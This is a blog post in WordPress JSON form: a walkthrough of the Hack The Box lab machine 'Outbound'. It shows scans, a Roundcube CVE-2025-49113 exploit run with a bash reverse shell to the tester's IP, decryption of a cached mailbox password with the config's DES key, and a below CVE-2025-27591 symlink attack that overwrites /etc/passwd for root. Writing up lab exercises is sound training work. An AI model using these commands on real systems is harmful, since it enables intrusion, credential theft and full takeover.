{"id":318,"date":"2025-07-19T11:16:39","date_gmt":"2025-07-19T03:16:39","guid":{"rendered":"https:\/\/www.misaka19008-lab.icu\/?p=318"},"modified":"2026-01-29T16:18:33","modified_gmt":"2026-01-29T08:18:33","slug":"318","status":"publish","type":"post","link":"https:\/\/www.misaka19008-lab.icu\/index.php\/2025\/07\/19\/318\/","title":{"rendered":"HTB Machine Outbound Penetration Test Notes"},"content":{"rendered":"<hr \/>\n<h1>Target Information<\/h1>\n<blockquote><p><strong>IP address: <\/strong><code><strong>10.129.103.139<\/strong><\/code><strong> (not a fixed IP address)<\/strong><\/p>\n<p><strong>Provided credentials: <code>tyler \/ LhKL1o9Nm3X2<\/code><\/strong><\/p><\/blockquote>\n<hr \/>\n<h1>Information Gathering<\/h1>\n<h2>ICMP Check<\/h2>\n<pre><code class=\"language-plain\">PING 10.129.103.139 (10.129.103.139) 56(84) bytes of data.\n64 bytes from 10.129.103.139: icmp_seq=1 ttl=63 time=284 ms\n64 bytes from 10.129.103.139: icmp_seq=2 ttl=63 time=282 ms\n64 bytes from 10.129.103.139: icmp_seq=3 ttl=63 time=296 ms\n64 bytes from 10.129.103.139: icmp_seq=4 ttl=63 time=268 ms\n\n--- 10.129.103.139 ping statistics ---\n4 packets transmitted, 4 received, 0% packet loss, time 3005ms\nrtt min\/avg\/max\/mdev = 268.047\/282.326\/295.807\/9.859 ms<\/code><\/pre>\n<p>Communication between the attacking machine and the target is normal.<\/p>\n<h2>Firewall Detection<\/h2>\n<pre><code class=\"language-plain\"># Nmap 7.95 scan initiated Sun Jul 13 07:19:12 2025 as: \/usr\/lib\/nmap\/nmap -sF -p- --min-rate 3000 -oN fin_result.txt 10.129.103.139\nWarning: 10.129.103.139 giving up on port because retransmission cap hit (10).\nNmap scan report for 10.129.103.139\nHost is up (0.21s latency).\nNot shown: 65533 closed tcp ports (reset)\nPORT   STATE         SERVICE\n22\/tcp open|filtered ssh\n80\/tcp open|filtered http\n\n# Nmap done at Sun Jul 13 07:19:46 2025 -- 1 IP address (1 
host up) scanned in 33.76 seconds<\/code><\/pre>\n<p>The target appears to have two ports open, <code>22\/ssh<\/code> and <code>80\/http<\/code>.<\/p>\n<h2>Network Port Scanning<\/h2>\n<p><code><strong>TCP<\/strong><\/code><strong> port scan results<\/strong><\/p>\n<pre><code class=\"language-plain\"># Nmap 7.95 scan initiated Sun Jul 13 07:24:38 2025 as: \/usr\/lib\/nmap\/nmap -sT -sV -A -p- --min-rate 3000 -oN tcp_result.txt 10.129.103.139\nWarning: 10.129.103.139 giving up on port because retransmission cap hit (10).\nNmap scan report for 10.129.103.139\nHost is up (0.23s latency).\nNot shown: 64557 closed tcp ports (conn-refused), 976 filtered tcp ports (no-response)\nPORT   STATE SERVICE VERSION\n22\/tcp open  ssh     OpenSSH 9.6p1 Ubuntu 3ubuntu13.12 (Ubuntu Linux; protocol 2.0)\n| ssh-hostkey: \n|   256 0c:4b:d2:76:ab:10:06:92:05:dc:f7:55:94:7f:18:df (ECDSA)\n|_  256 2d:6d:4a:4c:ee:2e:11:b6:c8:90:e6:83:e9:df:38:b0 (ED25519)\n80\/tcp open  http    nginx 1.24.0 (Ubuntu)\n|_http-server-header: nginx\/1.24.0 (Ubuntu)\n|_http-title: Did not follow redirect to http:\/\/mail.outbound.htb\/\nDevice type: general purpose|router\nRunning: Linux 4.X|5.X, MikroTik RouterOS 7.X\nOS CPE: cpe:\/o:linux:linux_kernel:4 cpe:\/o:linux:linux_kernel:5 cpe:\/o:mikrotik:routeros:7 cpe:\/o:linux:linux_kernel:5.6.3\nOS details: Linux 4.15 - 5.19, MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3)\nNetwork Distance: 2 hops\nService Info: OS: Linux; CPE: cpe:\/o:linux:linux_kernel\n\nTRACEROUTE (using proto 1\/icmp)\nHOP RTT       ADDRESS\n1   241.37 ms 10.10.14.1\n2   241.54 ms 10.129.103.139\n\nOS and Service detection performed. 
Please report any incorrect results at https:\/\/nmap.org\/submit\/ .\n# Nmap done at Sun Jul 13 07:25:30 2025 -- 1 IP address (1 host up) scanned in 52.45 seconds<\/code><\/pre>\n<p><code><strong>UDP<\/strong><\/code><strong> open port list scan results<\/strong><\/p>\n<pre><code class=\"language-plain\"># Nmap 7.95 scan initiated Sun Jul 13 07:26:28 2025 as: \/usr\/lib\/nmap\/nmap -sU -p- --min-rate 3000 -oN udp_ports.txt 10.129.103.139\nWarning: 10.129.103.139 giving up on port because retransmission cap hit (10).\nNmap scan report for 10.129.103.139\nHost is up (0.21s latency).\nAll 65535 scanned ports on 10.129.103.139 are in ignored states.\nNot shown: 65290 open|filtered udp ports (no-response), 245 closed udp ports (port-unreach)\n\n# Nmap done at Sun Jul 13 07:30:30 2025 -- 1 IP address (1 host up) scanned in 241.67 seconds<\/code><\/pre>\n<p><code><strong>UDP<\/strong><\/code><strong> port detailed information scan results<\/strong><\/p>\n<pre><code class=\"language-plain\">(none)<\/code><\/pre>\n<p>The scans also show that the target's operating system is <code>Ubuntu Linux<\/code>, that it runs <code>SSH<\/code> and <code>Nginx HTTP<\/code> services, that the primary domain is <code>outbound.htb<\/code>, and that a <code>Web<\/code> virtual host named <code>mail<\/code> exists.<\/p>\n<hr \/>\n<h1>Service Probing<\/h1>\n<h2>SSH Service (Port 22)<\/h2>\n<p>Connecting to the target with <code>ssh<\/code> shows that its <code>SSH<\/code> service allows both key and password login:<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1752363441641-137c65ad-e015-4761-b9cd-6a6fb13bba9d.png\" alt=\"\" 
\/><\/p>\n<h2>Web Application (Port 80)<\/h2>\n<p>Open the home page: <code>http:\/\/mail.outbound.htb\/<\/code><\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1752367636301-3d2ae93e-4f23-40a2-95a1-768dd19b0286.png\" alt=\"\" \/><\/p>\n<p>The <code>Web<\/code> service hosts the <code>Roundcube Webmail<\/code> online mail system. Try logging in with the credentials provided by the challenge:<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1752368184347-61db450d-4733-46d9-b014-c5e5703c206d.png\" alt=\"\" \/><\/p>\n<p>The <code>Roundcube<\/code> version is <code>v1.6.10<\/code>. An online search for known vulnerabilities turns up an authenticated command execution vulnerability, <code>CVE-2025-49113<\/code>: <a href=\"https:\/\/github.com\/hakaioffsec\/CVE-2025-49113-exploit\" target=\"_blank\"  rel=\"nofollow\" >GitHub - hakaioffsec\/CVE-2025-49113-exploit: Proof of Concept demonstrating Remote Code Execution through insecure deserialization in Roundcube (CVE-2025-49113).<\/a><\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1752368808698-5b633bc8-cb56-4219-bf8c-d726b34a95be.png\" alt=\"\" \/><\/p>\n<hr \/>\n<h1>Penetration Testing<\/h1>\n<h2>Roundcube RCE Exploitation<\/h2>\n<p>During <code>Web<\/code> service probing, we found that the target's <code>HTTP<\/code> service hosts the <code>Roundcube 
Webmail<\/code> mail system, version <code>v1.6.10<\/code>, which is affected by the authenticated command execution vulnerability <code>CVE-2025-49113<\/code>. We now exploit it.<\/p>\n<p>First, use <code>git clone<\/code> to download the <code>EXP<\/code> code:<\/p>\n<pre><code class=\"language-shell\">git clone https:\/\/github.com\/hakaioffsec\/CVE-2025-49113-exploit.git<\/code><\/pre>\n<p>Then start a <code>netcat<\/code> listener locally on port <code>443<\/code>:<\/p>\n<pre><code class=\"language-shell\">rlwrap nc -l -p 443 -s 10.10.14.2<\/code><\/pre>\n<p>Finally, run the following command to get a reverse <code>Shell<\/code>:<\/p>\n<pre><code class=\"language-shell\">php .\/CVE-2025-49113-exploit\/CVE-2025-49113.php http:\/\/mail.outbound.htb tyler \"LhKL1o9Nm3X2\" \"\/bin\/bash -c 'bash -i &gt;&amp; \/dev\/tcp\/10.10.14.2\/443 0&gt;&amp;1'\"<\/code><\/pre>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1752369414707-33bc7bec-78ac-43d3-8b1c-0ed7f1d869b7.png\" alt=\"\" \/><\/p>\n<p><strong>Reverse shell obtained!!<\/strong><\/p>\n<hr \/>\n<h1>Privilege Escalation<\/h1>\n<h2>Directory Information Gathering<\/h2>\n<p>After getting onto the target, gather information from the file system. First, three <code>Roundcube<\/code> configuration files are found in the <code>Web<\/code> application directory <code>\/var\/www\/html\/roundcube\/config\/<\/code>:<\/p>\n<pre><code class=\"language-shell\">ls -lA \/var\/www\/html\/roundcube\/config\/<\/code><\/pre>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1752393394145-a5f62d86-d41f-4d7b-a340-e98e97c6574a.png\" alt=\"\" 
\/><\/p>\n<p>Start with the <code>config.inc.php<\/code> file, which contains the <code>MySQL<\/code> connection credentials:<\/p>\n<pre><code class=\"language-php\">$config['db_dsnw'] = 'mysql:\/\/roundcube:RCDBPass2025@localhost\/roundcube';<\/code><\/pre>\n<ul>\n<li>Host: local machine<\/li>\n<li>Port: <code>3306<\/code><\/li>\n<li>Username: <code>roundcube<\/code><\/li>\n<li>Password: <code>RCDBPass2025<\/code><\/li>\n<\/ul>\n<p>In addition, there is a configuration option <code>des_key<\/code> that looks very much like a <code>DES<\/code> encryption key. According to the comment in the configuration file, this option defines a <code>DES<\/code> key used to encrypt the <code>IMAP<\/code> login password stored in the <code>session<\/code> table:<\/p>\n<pre><code class=\"language-php\">\/\/ This key is used to encrypt the users imap password which is stored\n\/\/ in the session record. For the default cipher method it must be\n\/\/ exactly 24 characters long.\n\/\/ YOUR KEY MUST BE DIFFERENT THAN THE SAMPLE VALUE FOR SECURITY REASONS\n$config['des_key'] = 'rcmail-!24ByteDESkey*Str';<\/code><\/pre>\n<ul>\n<li><code>DES<\/code> encryption key: <code>rcmail-!24ByteDESkey*Str<\/code><\/li>\n<\/ul>\n<p>However, this configuration file does not name the specific encryption algorithm, so look at the other configuration file, <code>defaults.inc.php<\/code>:<\/p>\n<pre><code class=\"language-php\">\/\/ Encryption algorithm. You can use any method supported by OpenSSL.\n\/\/ Default is set for backward compatibility to DES-EDE3-CBC,\n\/\/ but you can choose e.g. 
AES-256-CBC which we consider a better choice.\n$config['cipher_method'] = 'DES-EDE3-CBC';<\/code><\/pre>\n<p>This reveals the configuration option <code>cipher_method<\/code>, which sets the method <code>Roundcube<\/code> uses to encrypt the cached <code>IMAP<\/code> password to <code>DES-EDE3-CBC<\/code>!<\/p>\n<p>In addition, a <code>.dockerenv<\/code> file in the root directory confirms that the current environment is a <code>Docker<\/code> container:<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1752394279215-2cea5d22-4f64-4cca-a2b2-20c47f56a240.png\" alt=\"\" \/><\/p>\n<h2>Database Information Gathering<\/h2>\n<p>Directory information gathering already yielded the <code>MySQL<\/code> database credentials, so now log in to the database to gather more information:<\/p>\n<pre><code class=\"language-shell\">mysql -u roundcube -p\"RCDBPass2025\"<\/code><\/pre>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1752394357579-45ff65e8-47c5-4973-9d9c-4aeb01ec7ef5.png\" alt=\"\" \/><\/p>\n<p>The <code>roundcube<\/code> user has only one database. Switch to it and list the tables:<\/p>\n<pre><code class=\"language-plsql\">use roundcube\nshow tables;<\/code><\/pre>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1752394519460-24dfe20f-0448-432e-a9e4-7abba3c9095e.png\" alt=\"\" \/><\/p>\n<p>The database contains a <code>session<\/code> table. Take a look at it:<\/p>\n<pre><code class=\"language-plsql\">select * from session;<\/code><\/pre>\n<p><img decoding=\"async\" 
src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1752394810470-2fbdf378-0571-427f-92ab-0aa25021f345.png\" alt=\"\" \/><\/p>\n<p>It contains a large block of <code>Base64<\/code> text, which decodes to the following:<\/p>\n<pre><code class=\"language-plain\">language|s:5:\"en_US\";imap_namespace|a:4:{s:8:\"personal\";a:1:{i:0;a:2:{i:0;s:0:\"\";i:1;s:1:\"\/\";}}s:5:\"other\";N;s:6:\"shared\";N;s:10:\"prefix_out\";s:0:\"\";}imap_delimiter|s:1:\"\/\";imap_list_conf|a:2:{i:0;N;i:1;a:0:{}}user_id|i:1;username|s:5:\"jacob\";storage_host|s:9:\"localhost\";storage_port|i:143;storage_ssl|b:0;password|s:32:\"L7Rv00A8TuwJAr67kITxxcSgnIk25Am\/\";login_time|i:1749397119;timezone|s:13:\"Europe\/London\";STORAGE_SPECIAL-USE|b:1;auth_secret|s:26:\"DpYqv6maI9HxDL5GhcCd8JaQQW\";request_token|s:32:\"TIsOaABA1zHSXZOBpH6up5XFyayNRHaw\";task|s:4:\"mail\";skin_config|a:7:{s:17:\"supported_layouts\";a:1:{i:0;s:10:\"widescreen\";}s:22:\"jquery_ui_colors_theme\";s:9:\"bootstrap\";s:18:\"embed_css_location\";s:17:\"\/styles\/embed.css\";s:19:\"editor_css_location\";s:17:\"\/styles\/embed.css\";s:17:\"dark_mode_support\";b:1;s:26:\"media_browser_css_location\";s:4:\"none\";s:21:\"additional_logo_types\";a:3:{i:0;s:4:\"dark\";i:1;s:5:\"small\";i:2;s:10:\"small-dark\";}}imap_host|s:9:\"localhost\";page|i:1;mbox|s:5:\"INBOX\";sort_col|s:0:\"\";sort_order|s:4:\"DESC\";STORAGE_THREAD|a:3:{i:0;s:10:\"REFERENCES\";i:1;s:4:\"REFS\";i:2;s:14:\"ORDEREDSUBJECT\";}STORAGE_QUOTA|b:0;STORAGE_LIST-EXTENDED|b:1;list_attrib|a:6:{s:4:\"name\";s:8:\"messages\";s:2:\"id\";s:11:\"messagelist\";s:5:\"class\";s:42:\"listing messagelist sortheader fixedheader\";s:15:\"aria-labelledby\";s:22:\"aria-label-messagelist\";s:9:\"data-list\";s:12:\"message_list\";s:14:\"data-label-msg\";s:18:\"The list is 
empty.\";}unseen_count|a:2:{s:5:\"INBOX\";i:2;s:5:\"Trash\";i:0;}folders|a:1:{s:5:\"INBOX\";a:2:{s:3:\"cnt\";i:2;s:6:\"maxuid\";i:3;}}list_mod_seq|s:2:\"10\";<\/code><\/pre>\n<p>This is string data produced by serializing <code>PHP<\/code> objects, apparently information about a <code>Roundcube<\/code> user object. A careful read reveals the username <code>jacob<\/code> and the encrypted password <code>L7Rv00A8TuwJAr67kITxxcSgnIk25Am\/<\/code>.<\/p>\n<h2>Decrypting the Cached Roundcube Mailbox Password<\/h2>\n<p>The earlier directory and database information gathering uncovered the encrypted <code>IMAP<\/code> connection password that <code>Roundcube<\/code> caches in the database, along with its encryption method and key. Now search online for a way to decrypt it.<\/p>\n<p>Searching Google for the keywords <code>decrypt roundcube session password<\/code>, the first result is a post on the <code>Roundcube<\/code> community forum. Open it: <a href=\"https:\/\/www.roundcubeforum.net\/index.php?topic=23399.0\" target=\"_blank\"  rel=\"nofollow\" >Decrypt password from session-vars<\/a><\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1752395417286-6550d28c-d3da-408e-b60f-15da519de891.png\" alt=\"\" 
\/><\/p>\n<p>The original poster asks how to decrypt the encrypted credentials cached in the database, and one user replies that the code <code>Roundcube<\/code> uses to decrypt them can be found on <code>GitHub<\/code> and provides a link, which points to the <code>rcube.php<\/code> file.<\/p>\n<p>Follow the link to <code>GitHub<\/code> and read through the code; the decryption function is <code>decrypt()<\/code>:<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1752396708565-a58996bd-2715-4405-bfe1-62024c694a3c.png\" alt=\"\" \/><\/p>\n<p>Copy the function into a text editor and change the variables <code>ckey<\/code> and <code>method<\/code> to the key and encryption method found in the <code>Roundcube<\/code> configuration files, then call the function with the encrypted cached <code>IMAP<\/code> password found in the database as its argument:<\/p>\n<pre><code class=\"language-php\">&lt;?php\nfunction decrypt($cipher, $key = 'des_key', $base64 = true)\n    {\n        if (!is_string($cipher) || !strlen($cipher)) {\n            return false;\n        }\n\n        if ($base64) {\n            $cipher = base64_decode($cipher);\n            if ($cipher === false) {\n                return false;\n            }\n        }\n\n        $ckey    = \"rcmail-!24ByteDESkey*Str\";\n        $method  = \"DES-EDE3-CBC\";\n        $iv_size = openssl_cipher_iv_length($method);\n        $tag     = null;\n\n        if (preg_match('\/^##(.{16})##\/s', $cipher, 
$matches)) {\n            $tag    = $matches[1];\n            $cipher = substr($cipher, strlen($matches[0]));\n        }\n\n        $iv = substr($cipher, 0, $iv_size);\n\n        if (strlen($iv) &lt; $iv_size) {\n            return false;\n        }\n\n        $cipher = substr($cipher, $iv_size);\n        $clear  = openssl_decrypt($cipher, $method, $ckey, OPENSSL_RAW_DATA, $iv, $tag);\n\n        return $clear;\n    }\n\n    var_dump(decrypt(\"L7Rv00A8TuwJAr67kITxxcSgnIk25Am\/\"));\n?&gt;<\/code><\/pre>\n<p>Run it:<\/p>\n<pre><code class=\"language-shell\">php .\/decrypt_pass.php<\/code><\/pre>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1752397020649-e92fb57f-2b82-4656-bb10-217cbb5b34b4.png\" alt=\"\" \/><\/p>\n<p>This yields the <code>Roundcube<\/code> and <code>Docker<\/code> user credentials:<\/p>\n<ul>\n<li>Username: <code>jacob<\/code><\/li>\n<li>Password: <code>595mO8DmwGeD<\/code><\/li>\n<\/ul>\n<p>Log in to <code>Roundcube<\/code>:<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1752397299058-70c0b141-33fc-4e2e-9b31-37b9b105e3e7.png\" alt=\"\" \/><\/p>\n<p>The inbox contains two emails:<\/p>\n<pre><code class=\"language-plain\">========== Unexpected Resource Consumption (From: mel@outbound.htb)\nWe have been experiencing high resource consumption on our main server.\nFor now we have enabled resource monitoring with Below and have granted you privileges to inspect the the logs.\nPlease inform us immediately if you notice any irregularities.\n\nThanks!\n\nMel\n========== Important Update (From:  tyler@outbound.htb)\nDue to the recent change of policies your password has been changed.\nPlease use the following credentials to log into your account: gY4Wr3a1evp4\nRemember to change your password when you next log into your 
account.\n\nThanks!\n\nTyler<\/code><\/pre>\n<p>This reveals the operating system user credentials:<\/p>\n<ul>\n<li>Username: <code>jacob<\/code><\/li>\n<li>Password: <code>gY4Wr3a1evp4<\/code><\/li>\n<\/ul>\n<p>Log in over <code>SSH<\/code>:<\/p>\n<pre><code class=\"language-shell\">ssh jacob@outbound.htb<\/code><\/pre>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1752397724270-3cbc41c9-4e64-4a36-998b-628cfae7099a.png\" alt=\"\" \/><\/p>\n<h2>Privilege Escalation via a Vulnerable Sudo Program<\/h2>\n<p>After logging in as <code>jacob<\/code>, run <code>sudo -l<\/code> to list the current user's privileges:<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1752891702915-ecdf5f57-1691-4b47-968b-1a295f7c10bb.png\" alt=\"\" \/><\/p>\n<p>The current user can run the <code>\/usr\/bin\/below<\/code> program as any user without a password. Run the following commands to see details about the program:<\/p>\n<pre><code class=\"language-shell\">file \/usr\/bin\/below\nbelow --help<\/code><\/pre>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1752891819308-db7a8a88-1b83-4017-b0de-fa4bb8b30519.png\" alt=\"\" \/><\/p>\n<p>Based on the program's help output, run <code>below live<\/code> to determine what the program actually does:<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1752891900709-28c9e3f4-f239-439e-9ad3-4e73e09b5596.png\" alt=\"\" 
\/><\/p>\n<p>The program is a tool that monitors and records operating system processes and resource usage in real time. A <code>GitHub<\/code> search finds the project's repository: <a href=\"https:\/\/github.com\/facebookincubator\/below\" target=\"_blank\"  rel=\"nofollow\" >GitHub - facebookincubator\/below: A time traveling resource monitor for modern Linux systems<\/a><\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1752892026756-fea7300e-caf3-4963-b137-a34c0428c32d.png\" alt=\"\" \/><\/p>\n<p>The <code>Security<\/code> page has one entry. Open it:<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1752892100019-a1af46e8-f1bd-4bc6-ba86-4df89a0740e8.png\" alt=\"\" \/><\/p>\n<p>The <code>below<\/code> program, which is runnable via <code>Sudo<\/code> on the target, has a privilege escalation vulnerability, <code>CVE-2025-27591<\/code>! An online search finds an exploit script: <a href=\"https:\/\/github.com\/obamalaolu\/CVE-2025-27591\/blob\/main\/CVE-2025-27591.sh\" target=\"_blank\"  rel=\"nofollow\" >CVE-2025-27591\/CVE-2025-27591.sh at main \u00b7 obamalaolu\/CVE-2025-27591 \u00b7 GitHub<\/a><\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1752892535633-4e297eb1-1810-45a6-98de-af223e9a4358.png\" alt=\"\" 
\/><\/p>\n<p>Reading through the code shows that the vulnerability works as follows:<\/p>\n<ol>\n<li>The log output directory of <code>below<\/code>, <code>\/var\/log\/below\/<\/code>, is owned by <code>root<\/code> but has permissions <code>777<\/code>, so any user can delete and create files in it, including symbolic links pointing to critical system files;<\/li>\n<li>When a user runs the <code>replay<\/code> feature of <code>below<\/code> with an invalid time, the program writes the error message to the file <code>\/var\/log\/below\/error_&lt;username&gt;.log<\/code> and sets the file's permissions to <code>666<\/code> before writing. If that log file has been replaced with a symbolic link to <code>\/etc\/passwd<\/code>, the <code>passwd<\/code> file becomes writable by any user and log data is written to it;<\/li>\n<li>Once <code>passwd<\/code> is writable by any user, we can write custom system user and password data into the file and thereby escalate privileges.<\/li>\n<\/ol>\n<p>Now for the exploitation. First confirm that the <code>\/var\/log\/below\/<\/code> directory is writable:<\/p>\n<pre><code class=\"language-shell\">ls -lA \/var\/log | grep below<\/code><\/pre>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1752893153938-52206c07-8a62-4505-8451-5abe7d4033a1.png\" alt=\"\" 
\/><\/p>\n<p>Next, list the files in the directory, delete the <code>error_root.log<\/code> file, and create a symbolic link with the same name that points to <code>\/etc\/passwd<\/code>:<\/p>\n<pre><code class=\"language-shell\">cd \/var\/log\/below &amp;&amp; ls -lA\nrm -rf error_root.log\nln -sf \/etc\/passwd \/var\/log\/below\/error_root.log<\/code><\/pre>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1752893343624-4ae6c37c-bdea-478d-89ac-fdeb562a929f.png\" alt=\"\" \/><\/p>\n<p>Once the link is created, back up the <code>passwd<\/code> file to the <code>\/tmp<\/code> directory and add a <code>root<\/code> user password to the file (the password hash is generated with <code>openssl<\/code>):<\/p>\n<pre><code class=\"language-shell\">cp \/etc\/passwd \/tmp\/evil_passwd\nopenssl passwd -6 Asd310056\nnano \/tmp\/evil_passwd<\/code><\/pre>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1752893567697-e37c6cdd-41e8-46d2-80e6-0238488cf335.png\" alt=\"\" \/><\/p>\n<p>Next, run the <code>below<\/code> command with <code>sudo<\/code> to trigger error logging, which changes the permissions of <code>\/etc\/passwd<\/code>:<\/p>\n<pre><code class=\"language-shell\">sudo below replay --time \"invalid\"<\/code><\/pre>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1752893748256-739ff92a-fa21-4a55-994d-c090a66860f8.png\" alt=\"\" 
\/><\/p>\n<p>The permissions were changed successfully! Write the contents of the malicious password file <code>\/tmp\/evil_passwd<\/code> to the <code>\/etc\/passwd<\/code> file, then switch to the <code>root<\/code> user:<\/p>\n<pre><code class=\"language-shell\">cat \/tmp\/evil_passwd &gt; \/etc\/passwd\nsu -<\/code><\/pre>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1752893868958-8d77d521-daa2-4e2d-a2e8-951a051fbdf1.png\" alt=\"\" \/><\/p>\n<p><strong>Privilege escalation succeeded!!!!<\/strong><\/p>\n<h1>This concludes the penetration test of this target machine<\/h1>\n<hr \/>\n","protected":false},"excerpt":{"rendered":"<p>Target Information IP address: 10.129.103.139 (not a fixed IP address) Provided credentials: tyler \/ LhKL1o9Nm3X2 Information Gathering  &#8230;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_seopress_robots_primary_cat":"","_seopress_titles_title":"","_seopress_titles_desc":"","_seopress_robots_index":"","emotion":"","emotion_color":"","title_style":"","license":"","footnotes":""},"categories":[18,14],"tags":[],"class_list":["post-318","post","type-post","status-publish","format-standard","hentry","category-htb_season_8","category-linux_machines"],"_links":{"self":[{"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/posts\/318","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json
\/wp\/v2\/comments?post=318"}],"version-history":[{"count":1,"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/posts\/318\/revisions"}],"predecessor-version":[{"id":319,"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/posts\/318\/revisions\/319"}],"wp:attachment":[{"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/media?parent=318"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/categories?post=318"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/tags?post=318"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}